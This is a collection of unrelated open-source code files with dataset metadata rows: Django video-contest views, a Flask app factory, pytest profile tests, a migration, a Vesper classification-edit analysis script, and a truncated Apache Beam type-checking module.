# 100, 100, 100, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#  % Communication costs between different processors (for some fixed transfer size): {qij}, 1 ≤ i ≤ m, 1 ≤ j ≤ m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
if __name__ == "__main__":
main()
| apache-2.0 | 297,183,618,561,606,400 | 32.487805 | 242 | 0.546769 | false |
NicolasBonet/cloud | videosapp/views.py | 1 | 8807 | from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render_to_response, render
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.forms import UserCreationForm
from videosapp.forms import *
from videosapp.models import Concurso
from videosapp.models import Video
from django.core.paginator import Paginator, InvalidPage, EmptyPage
import dateutil.parser
import datetime
import os.path
from django.core.mail import send_mail
from django.conf import settings
from moviepy.editor import *
def index(request):
return render(request, "index.html")
def post_registrarse(request):
if request.user.is_authenticated():
raise Exception("Ya estas registrado");
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
if (request.POST['password2'] != request.POST['password1']):
raise Exception("Las contrasenas no coinciden");
new_user = form.save()
new_user.email = request.POST['email']
new_user.first_name = request.POST['first_name']
new_user.last_name = request.POST['last_name']
new_user.save()
return render_to_response("registro.html", dict(mensajeExito="Usuario creado!"), RequestContext(request))
else:
return render_to_response("registro.html", dict(mensajeError=form.errors), RequestContext(request))
else:
form = UserCreationForm()
return render(request, "registro.html", {
'form': form,
})
def post_concurso(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
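    # str(datetime.datetime.now()) looks like 'YYYY-MM-DD HH:MM:SS.ffffff'; splitting on
    # the space keeps only the date part, which is passed to the template as 'ahora'.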
vahora = str(datetime.datetime.now())
vahora = vahora.split(' ')
if request.method == 'POST':
form = ConcursoCreationForm(request.POST, request.FILES)
# If data is valid, proceeds to create a new post and redirect the user
if form.is_valid():
if (Concurso.objects.filter(url = request.POST['url'].lower()).count() > 0):
raise Exception("Esa URL ya esta siendo usada por otro concurso");
new_concurso = form.save()
new_concurso.user = request.user
new_concurso.url = new_concurso.url.lower()
new_concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
new_concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
new_concurso.url = request.POST['url'].lower()
new_concurso.save()
return HttpResponseRedirect("/perfil")
else:
return render_to_response("crear_concurso.html", dict(
mensajeError=form.errors, ahora = vahora[0]), RequestContext(request))
else:
form = ConcursoCreationForm()
return render(request, "crear_concurso.html", {
'form': form,
'ahora': vahora[0],
})
def editar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
if request.method == 'POST':
urlNueva = request.POST['url'].lower()
if (Concurso.objects.filter(url = urlNueva).exclude(id = concurso.id).count() > 0):
return render_to_response("editar_concurso.html",
dict(mensajeError = "Url " + urlNueva + " en uso!",
concurso = concurso, ahora = str(concurso.fecha_inicio), fin = str(concurso.fecha_fin)),
RequestContext(request))
concurso.nombre = request.POST['nombre']
concurso.url = urlNueva
concurso.descripcion = request.POST['descripcion']
concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
concurso.save()
return HttpResponseRedirect("/perfil")
ahora = str(concurso.fecha_inicio)
fin = str(concurso.fecha_fin)
return render(request, "editar_concurso.html", {
'ahora': ahora,
'fin': fin,
'concurso': concurso,
})
def borrar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
concurso.delete()
return HttpResponseRedirect("/perfil")
def detalle_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
videos = Video.objects.all().filter(concurso=concurso)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("videosadmin.html", dict(videos=videos, user=request.user))
def perfil(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
#concursos = Concurso.objects.get(user=request.user)
concursos = Concurso.objects.all().filter(user=request.user).order_by('-fecha_inicio')
paginator = Paginator(concursos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
concursos = paginator.page(page)
except (InvalidPage, EmptyPage):
concursos = paginator.page(paginator.num_pages)
return render_to_response("list.html", dict(concursos=concursos, user=request.user), context_instance=RequestContext(request))
def concurso(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
videos = Video.objects.all().filter(concurso=c, convertido=True)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("concurso.html", dict(videos=videos, user=request.user, concurso=c, page=page), RequestContext(request))
@csrf_exempt
def subir_video(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
if request.method == 'POST':
form = UploadForm(request.POST, request.FILES)
if form.is_valid():
video = form.save()
video.convertido = False
video.correo_usuario = request.POST['correo_usuario']
video.nombre_usuario = request.POST['nombre_usuario']
video.apellidos_usuario = request.POST['apellidos_usuario']
video.concurso = Concurso.objects.get(url=urlConcurso)
video.save()
return render_to_response("subir_video.html", dict(concurso=c, mensajeExito="Hemos recibido tu video y los estamos procesado para que sea publicado. Tan pronto el video quede publicado en la pagina del concurso te notificaremos por email"), RequestContext(request))
else:
return render_to_response("subir_video.html", dict(concurso=c, mensajeError=form.errors), RequestContext(request))
else:
form = UploadForm()
return render_to_response("subir_video.html", dict(concurso=c), RequestContext(request))
def convert_video(request):
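    # moviepy writes 'temp-audio.m4a' while encoding (see write_videofile below), so if
    # that file exists a conversion is already in progress and this request is skipped.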
if (os.path.isfile("temp-audio.m4a")):
return None
video = Video.objects.filter(convertido=False).order_by('fecha_inicio')[:1].get()
videopath = settings.BASE_DIR + settings.STATIC_URL + "videos/" + os.path.basename(video.video.name)
os.chmod(videopath, 0777)
clip = VideoFileClip(videopath)
send_mail('El video convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', '[email protected]', ['[email protected]'])
clip.write_videofile(settings.BASE_DIR + settings.STATIC_URL + "convertidos/" + str(video.id) + ".mp4",
codec='libx264',
audio_codec='aac',
temp_audiofile='temp-audio.m4a',
remove_temp=True
)
send_mail('El video ' + video.nombre + ' ha sido convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', '[email protected]', [video.correo_usuario])
video.convertido = True
video.save()
| agpl-3.0 | 8,715,289,717,513,734,000 | 38.316964 | 277 | 0.660384 | false |
flopezag/fiware-backlog | app/__init__.py | 1 | 2329 | import logging
import os
from flask import Flask
from flask_login import LoginManager
from config import config
from kconfig import settings
__author__ = 'Manuel Escriche'
login_manager = LoginManager()
# login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
login_manager.login_message = "Welcome to FIWARE Backlog Management Website!!!"
def create_app(config_name):
app = Flask(__name__.split('.')[0])
app.config.from_object(config[config_name])
config[config_name].init_app(app)
settings.storeHome = app.config['STORE']
login_manager.init_app(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
from .urgent import urgent as urgent_blueprint
app.register_blueprint(urgent_blueprint, url_prefix='/urgent')
from .accountsdesk import accountsdesk as accountsdesk_blueprint
app.register_blueprint(accountsdesk_blueprint, url_prefix='/accountsdesk')
from .helpdesk import helpdesk as helpdesk_blueprint
app.register_blueprint(helpdesk_blueprint, url_prefix='/helpdesk')
from .lab import lab as lab_blueprint
app.register_blueprint(lab_blueprint, url_prefix='/lab')
from .chapters import chapters as chapters_blueprint
app.register_blueprint(chapters_blueprint, url_prefix='/chapters')
from .enablers import enablers as enablers_blueprint
app.register_blueprint(enablers_blueprint, url_prefix='/enablers')
from .tools import tools as tools_blueprint
app.register_blueprint(tools_blueprint, url_prefix='/tools')
from .delivery import delivery as delivery_blueprint
app.register_blueprint(delivery_blueprint, url_prefix='/delivery')
from .guide import guide as guide_blueprint
app.register_blueprint(guide_blueprint, url_prefix='/guide')
from .coordination import coordination as coordination_blueprint
app.register_blueprint(coordination_blueprint, url_prefix='/coordination')
from .workgroups import workgroups as workgroups_blueprint
app.register_blueprint(workgroups_blueprint, url_prefix='/workgroups')
from .api import api as api_blueprint
app.register_blueprint(api_blueprint, url_prefix='/api')
return app
| apache-2.0 | 266,195,812,630,218,800 | 33.761194 | 79 | 0.750537 | false |
pythonindia/wye | tests/functional/test_edit_profile.py | 1 | 6792 |
import pytest
from .. import base
from .. import factories as f
from .. utils import create_user_verify_login
pytestmark = pytest.mark.django_db
def create_user_type(slug='tutor'):
tutor_type = f.create_usertype(slug=slug, display_name=slug)
return tutor_type
def test_signup_college_poc_flow(base_url, browser, outbox):
create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
    # mobile number check
url = base_url + '/profile/' + user.username + '/edit/'
browser.visit(url)
browser.fill('mobile', '')
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Use first name and last name
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# occupation is required
browser.fill('first_name', 'First Name')
browser.fill('last_name', 'Last Name')
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
    # Success case
browser = base.profile_poc_create(
browser, url, None,
section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
def test_signup_tutor_flow(base_url, browser, outbox):
tutor_type = create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(tutor_type)
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
    # mobile number check
url = base_url + '/profile/' + user.username + '/edit'
browser.visit(url)
browser.fill('mobile', '')
browser.select('usertype', tutor_type.id)
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Github check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('Github or LinkedIn field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present(
'Interested workshop level field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('interested_level', 1)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
browser = base.profile_tutor_create(
browser, url, tutor_type.id, section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
org = f.create_organisation(location=location1)
org.user.add(user)
# section2 = f.create_workshop_section(name='section2')
w1 = f.create_workshop(requester=org, workshop_section=section1)
w1.presenter.add(user)
w2 = f.create_workshop(requester=org, workshop_section=section1)
w2.presenter.add(user)
w3 = f.create_workshop(requester=org, workshop_section=section1)
w3.presenter.add(user)
w4 = f.create_workshop(requester=org, workshop_section=section1)
w4.presenter.add(user)
w5 = f.create_workshop(requester=org, workshop_section=section1)
w5.presenter.add(user)
url = base_url + '/profile/' + user.username + '/'
browser.visit(url)
# assert browser.is_text_present('Deactive Account')
| mit | -2,212,431,880,996,849,200 | 36.944134 | 75 | 0.686543 | false |
shawnhermans/cyborg-identity-manager | cyborg_identity/migrations/0003_auto_20150628_2144.py | 1 | 1089 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cyborg_identity', '0002_iscontactemailaddress_iscontactphonenumber_phonenumber'),
]
operations = [
migrations.RemoveField(
model_name='emailaddress',
name='node_ptr',
),
migrations.RemoveField(
model_name='iscontactemailaddress',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='iscontactphonenumber',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='phonenumber',
name='node_ptr',
),
migrations.DeleteModel(
name='EmailAddress',
),
migrations.DeleteModel(
name='IsContactEmailAddress',
),
migrations.DeleteModel(
name='IsContactPhoneNumber',
),
migrations.DeleteModel(
name='PhoneNumber',
),
]
| mit | -3,159,675,205,751,116,000 | 24.928571 | 91 | 0.55831 | false |
CalthorpeAnalytics/urbanfootprint | footprint/main/management/tests/footprint_init_test.py | 1 | 2564 | #!/bin/env python
# UrbanFootprint v1.5
# Copyright (C) 2017 Calthorpe Analytics
#
# This file is part of UrbanFootprint version 1.5
#
# UrbanFootprint is distributed under the terms of the GNU General
# Public License version 3, as published by the Free Software Foundation. This
# code is distributed WITHOUT ANY WARRANTY, without implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License v3 for more details; see <http://www.gnu.org/licenses/>.
from unittest import TestCase
from testfixtures import Replacer
from footprint.main.management.commands.footprint_init import FootprintInit
class TestFootprintInit(TestCase):
def test_empty_init(self):
FootprintInit().run_footprint_init(skip=True)
def test_wrong_celery_setting(self):
with Replacer() as r:
r.replace('django.conf.settings.CELERY_ALWAYS_EAGER', False)
with self.assertRaises(Exception):
FootprintInit().run_footprint_init(skip=True)
def test_recalculate_bounds(self):
FootprintInit().run_footprint_init(skip=True, recalculate_bounds=True)
def test_all_publishers(self):
FootprintInit().run_footprint_init(skip=False)
def test_all_publishers_nodb_entity(self):
FootprintInit().run_footprint_init(skip=False, nodb_entity=True)
def test_all_publishers_noimport(self):
FootprintInit().run_footprint_init(skip=False, noimport=True)
def test_all_publishers_nolayer(self):
FootprintInit().run_footprint_init(skip=False, nolayer=True)
def test_all_publishers_noresult(self):
FootprintInit().run_footprint_init(skip=False, noresult=True)
def test_all_publishers_notilestache(self):
FootprintInit().run_footprint_init(skip=False, notilestache=True)
def test_all_publishers_nobuilt_form(self):
FootprintInit().run_footprint_init(skip=False, form=True)
def test_all_publishers_nouser(self):
FootprintInit().run_footprint_init(skip=False, nouser=True)
def test_delete_clones(self):
FootprintInit().run_footprint_init(skip=True, delete_clones=True)
# Doesn't work until we have FutureScenario objects in the test database
def disabled_layer_from_selection(self):
FootprintInit().run_footprint_init(skip=True, test_layer_from_selection=True)
# Doesn't work until we have FutureScenario objects in the test database
def disabled_clone_scenarios(self):
FootprintInit().run_footprint_init(skip=True, test_clone_scenarios=True)
| gpl-3.0 | 66,201,886,796,999,350 | 36.705882 | 85 | 0.726989 | false |
HaroldMills/Vesper | scripts/detector_eval/manual/analyze_classification_edits.py | 1 | 5201 | """
Script that analyzes the classification edits of an archive.
The analysis focuses on changes user "dleick" made to classifications
created by user "cvoss", in order to inform decisions about how to most
efficiently direct classification effort.
"""
from collections import defaultdict
import sqlite3
# Set up Django. This must happen before any use of Django, including
# ORM class imports.
import vesper.util.django_utils as django_utils
django_utils.set_up_django()
from vesper.django.app.models import AnnotationInfo, Processor, User
ANNOTATION_NAME = 'Classification'
DETECTOR_NAMES = frozenset([
'BirdVoxDetect 0.1.a0 AT 05',
'MPG Ranch Thrush Detector 0.0 40',
'MPG Ranch Tseep Detector 0.0 40'
])
DATABASE_FILE_NAME = 'Archive Database.sqlite'
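# Selects every classification-annotation edit made since START_DATE on clips created
# by the given detector, joining through vesper_clip to filter on the creating processor.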
QUERY = '''
select e.clip_id, e.action, e.value, e.creating_user_id, e.creation_time
from vesper_string_annotation_edit as e
join vesper_clip as c on e.clip_id = c.id
where c.creating_processor_id = ?
and e.info_id = ?
and e.creation_time >= ?;
'''
START_DATE = '2019-04-01'
def main():
annotation_info = AnnotationInfo.objects.get(name=ANNOTATION_NAME)
users = get_users()
for processor in Processor.objects.all():
if processor.name in DETECTOR_NAMES:
print('{}:'.format(processor.name))
edits = get_classification_edits(processor.id, annotation_info.id)
analyze_edits(edits, users)
def get_users():
return dict((u.id, u.username) for u in User.objects.all())
def get_classification_edits(detector_id, annotation_info_id):
connection = sqlite3.connect(DATABASE_FILE_NAME)
values = (detector_id, annotation_info_id, START_DATE)
with connection:
rows = connection.execute(QUERY, values)
edits = defaultdict(list)
for clip_id, action, value, user_id, time in rows:
edits[clip_id].append((action, value, user_id, time))
connection.close()
return edits
def analyze_edits(edit_lists, user_names):
history_counts = count_edit_histories(edit_lists, user_names)
change_counts = count_changes(history_counts)
# print(' history counts:')
# histories = sorted(history_counts.keys())
# for history in histories:
# print(' {} {}'.format(history, history_counts[history]))
print(" Debbie's classification change counts:")
changes = sorted(change_counts.keys())
for old, new in changes:
count = change_counts[(old, new)]
print(' {} -> {} {}'.format(old, new, count))
num_changes = sum(change_counts.values())
total_num_clips = sum(history_counts.values())
changed_percent = 100 * num_changes / total_num_clips
print((
" Debbie changed Carrie's classifications for {} of {} clips, "
'or {:.1f} percent.').format(
num_changes, total_num_clips, changed_percent))
def count_edit_histories(edit_lists, user_names):
counts = defaultdict(int)
clip_ids = sorted(edit_lists.keys())
for clip_id in clip_ids:
edits = edit_lists[clip_id]
histories = tuple([get_count_key(e, user_names) for e in edits])
counts[histories] += 1
return counts
def get_count_key(edit, user_names):
action, classification, user_id, _ = edit
if user_id is None:
user_name = 'transfer'
else:
user_name = user_names[user_id]
if action == 'S':
return (user_name, classification)
elif action == 'D':
return (user_name, 'Unclassified')
else:
raise ValueError('Unrecognized edit action "{}".'.format(action))
def count_changes(history_counts):
change_counts = defaultdict(int)
for edits, count in history_counts.items():
if edits[-1][0] == 'dleick':
# Debbie made final edit in this history
debbie_classification = edits[-1][1]
i = find_final_carrie_edit(edits)
if i == -1:
# history includes no Carrie edits
accumulate_change_count(
change_counts, 'Unclassified', debbie_classification,
count)
else:
# history includes at least one Carrie edit
carrie_classification = edits[i][1]
accumulate_change_count(
change_counts, carrie_classification,
debbie_classification, count)
return change_counts
def find_final_carrie_edit(edits):
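    # Walk the edits from newest to oldest and return the index of the most recent
    # edit made by user "cvoss", or -1 if there is none.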
for i, (name, _) in enumerate(reversed(edits)):
if name == 'cvoss':
return len(edits) - i - 1
return -1
def accumulate_change_count(change_counts, old, new, count):
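    # Count only genuine changes; Unclassified -> Noise is not treated as a change.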
if new != old and not (old == 'Unclassified' and new == 'Noise'):
change_counts[(old, new)] += count
if __name__ == '__main__':
main()
| mit | -7,949,347,712,655,548,000 | 26.962366 | 78 | 0.585849 | false |
aaltay/beam | sdks/python/apache_beam/typehints/typecheck.py | 1 | 12441 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Runtime type checking support.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import collections
import inspect
import types
from future.utils import raise_with_traceback
from past.builtins import unicode
from apache_beam import pipeline
from apache_beam.pvalue import TaggedOutput
from apache_beam.transforms import core
from apache_beam.transforms.core import DoFn
from apache_beam.transforms.window import WindowedValue
from apache_beam.typehints.decorators import GeneratorWrapper
from apache_beam.typehints.decorators import TypeCheckError
from apache_beam.typehints.decorators import _check_instance_type
from apache_beam.typehints.decorators import getcallargs_forhints
from apache_beam.typehints.typehints import CompositeTypeHintError
from apache_beam.typehints.typehints import SimpleTypeHintError
from apache_beam.typehints.typehints import check_constraint
class AbstractDoFnWrapper(DoFn):
"""An abstract class to create wrapper around DoFn"""
def __init__(self, dofn):
super(AbstractDoFnWrapper, self).__init__()
self.dofn = dofn
def _inspect_start_bundle(self):
return self.dofn.get_function_arguments('start_bundle')
def _inspect_process(self):
return self.dofn.get_function_arguments('process')
def _inspect_finish_bundle(self):
return self.dofn.get_function_arguments('finish_bundle')
def wrapper(self, method, args, kwargs):
return method(*args, **kwargs)
def setup(self):
return self.dofn.setup()
def start_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.start_bundle, args, kwargs)
def process(self, *args, **kwargs):
return self.wrapper(self.dofn.process, args, kwargs)
def finish_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.finish_bundle, args, kwargs)
def teardown(self):
return self.dofn.teardown()
class OutputCheckWrapperDoFn(AbstractDoFnWrapper):
"""A DoFn that verifies against common errors in the output type."""
def __init__(self, dofn, full_label):
super(OutputCheckWrapperDoFn, self).__init__(dofn)
self.full_label = full_label
def wrapper(self, method, args, kwargs):
try:
result = method(*args, **kwargs)
except TypeCheckError as e:
# TODO(BEAM-10710): Remove the 'ParDo' prefix for the label name
error_msg = (
'Runtime type violation detected within ParDo(%s): '
'%s' % (self.full_label, e))
raise_with_traceback(TypeCheckError(error_msg))
else:
return self._check_type(result)
@staticmethod
def _check_type(output):
if output is None:
return output
elif isinstance(output, (dict, bytes, str, unicode)):
object_type = type(output).__name__
raise TypeCheckError(
'Returning a %s from a ParDo or FlatMap is '
'discouraged. Please use list("%s") if you really '
'want this behavior.' % (object_type, output))
elif not isinstance(output, collections.Iterable):
raise TypeCheckError(
'FlatMap and ParDo must return an '
'iterable. %s was returned instead.' % type(output))
return output
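# Illustrative failure mode for the check above (example only, not part of the
# original module): a DoFn whose process() returns the bare string 'abc' is
# rejected by _check_type, since the string would otherwise be iterated
# character by character downstream; returning ['abc'] instead passes the check.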
class TypeCheckWrapperDoFn(AbstractDoFnWrapper):
"""A wrapper around a DoFn which performs type-checking of input and output.
"""
def __init__(self, dofn, type_hints, label=None):
super(TypeCheckWrapperDoFn, self).__init__(dofn)
self._process_fn = self.dofn._process_argspec_fn()
if type_hints.input_types:
input_args, input_kwargs = type_hints.input_types
self._input_hints = getcallargs_forhints(
self._process_fn, *input_args, **input_kwargs)
else:
self._input_hints = None
# TODO(robertwb): Multi-output.
self._output_type_hint = type_hints.simple_output_type(label)
def wrapper(self, method, args, kwargs):
result = method(*args, **kwargs)
return self._type_check_result(result)
def process(self, *args, **kwargs):
if self._input_hints:
actual_inputs = inspect.getcallargs(self._process_fn, *args, **kwargs) # pylint: disable=deprecated-method
for var, hint in self._input_hints.items():
if hint is actual_inputs[var]:
# self parameter
continue
_check_instance_type(hint, actual_inputs[var], var, True)
return self._type_check_result(self.dofn.process(*args, **kwargs))
def _type_check_result(self, transform_results):
if self._output_type_hint is None or transform_results is None:
return transform_results
def type_check_output(o):
# TODO(robertwb): Multi-output.
x = o.value if isinstance(o, (TaggedOutput, WindowedValue)) else o
self.type_check(self._output_type_hint, x, is_input=False)
# If the return type is a generator, then we will need to interleave our
# type-checking with its normal iteration so we don't deplete the
# generator initially just by type-checking its yielded contents.
if isinstance(transform_results, types.GeneratorType):
return GeneratorWrapper(transform_results, type_check_output)
for o in transform_results:
type_check_output(o)
return transform_results
@staticmethod
def type_check(type_constraint, datum, is_input):
"""Typecheck a PTransform related datum according to a type constraint.
This function is used to optionally type-check either an input or an output
to a PTransform.
Args:
      type_constraint: An instance of a typehints.TypeConstraint, one of the
white-listed builtin Python types, or a custom user class.
datum: An instance of a Python object.
is_input: True if 'datum' is an input to a PTransform's DoFn. False
otherwise.
Raises:
TypeError: If 'datum' fails to type-check according to 'type_constraint'.
"""
datum_type = 'input' if is_input else 'output'
try:
check_constraint(type_constraint, datum)
except CompositeTypeHintError as e:
raise_with_traceback(TypeCheckError(e.args[0]))
except SimpleTypeHintError:
error_msg = (
"According to type-hint expected %s should be of type %s. "
"Instead, received '%s', an instance of type %s." %
(datum_type, type_constraint, datum, type(datum)))
raise_with_traceback(TypeCheckError(error_msg))
class TypeCheckCombineFn(core.CombineFn):
"""A wrapper around a CombineFn performing type-checking of input and output.
"""
def __init__(self, combinefn, type_hints, label=None):
self._combinefn = combinefn
self._input_type_hint = type_hints.input_types
self._output_type_hint = type_hints.simple_output_type(label)
self._label = label
def setup(self, *args, **kwargs):
self._combinefn.setup(*args, **kwargs)
def create_accumulator(self, *args, **kwargs):
return self._combinefn.create_accumulator(*args, **kwargs)
def add_input(self, accumulator, element, *args, **kwargs):
if self._input_type_hint:
try:
_check_instance_type(
self._input_type_hint[0][0].tuple_types[1],
element,
'element',
True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return self._combinefn.add_input(accumulator, element, *args, **kwargs)
def merge_accumulators(self, accumulators, *args, **kwargs):
return self._combinefn.merge_accumulators(accumulators, *args, **kwargs)
def compact(self, accumulator, *args, **kwargs):
return self._combinefn.compact(accumulator, *args, **kwargs)
def extract_output(self, accumulator, *args, **kwargs):
result = self._combinefn.extract_output(accumulator, *args, **kwargs)
if self._output_type_hint:
try:
_check_instance_type(
self._output_type_hint.tuple_types[1], result, None, True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return result
def teardown(self, *args, **kwargs):
self._combinefn.teardown(*args, **kwargs)
class TypeCheckVisitor(pipeline.PipelineVisitor):
_in_combine = False
def enter_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = True
self._wrapped_fn = applied_transform.transform.fn = TypeCheckCombineFn(
applied_transform.transform.fn,
applied_transform.transform.get_type_hints(),
applied_transform.full_label)
def leave_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = False
def visit_transform(self, applied_transform):
transform = applied_transform.transform
if isinstance(transform, core.ParDo):
if self._in_combine:
if isinstance(transform.fn, core.CombineValuesDoFn):
transform.fn.combinefn = self._wrapped_fn
else:
transform.fn = transform.dofn = OutputCheckWrapperDoFn(
TypeCheckWrapperDoFn(
transform.fn,
transform.get_type_hints(),
applied_transform.full_label),
applied_transform.full_label)
class PerformanceTypeCheckVisitor(pipeline.PipelineVisitor):
def visit_transform(self, applied_transform):
transform = applied_transform.transform
full_label = applied_transform.full_label
# Store output type hints in current transform
output_type_hints = self.get_output_type_hints(transform)
if output_type_hints:
transform._add_type_constraint_from_consumer(
full_label, output_type_hints)
# Store input type hints in producer transform
input_type_hints = self.get_input_type_hints(transform)
if input_type_hints and len(applied_transform.inputs):
producer = applied_transform.inputs[0].producer
if producer:
producer.transform._add_type_constraint_from_consumer(
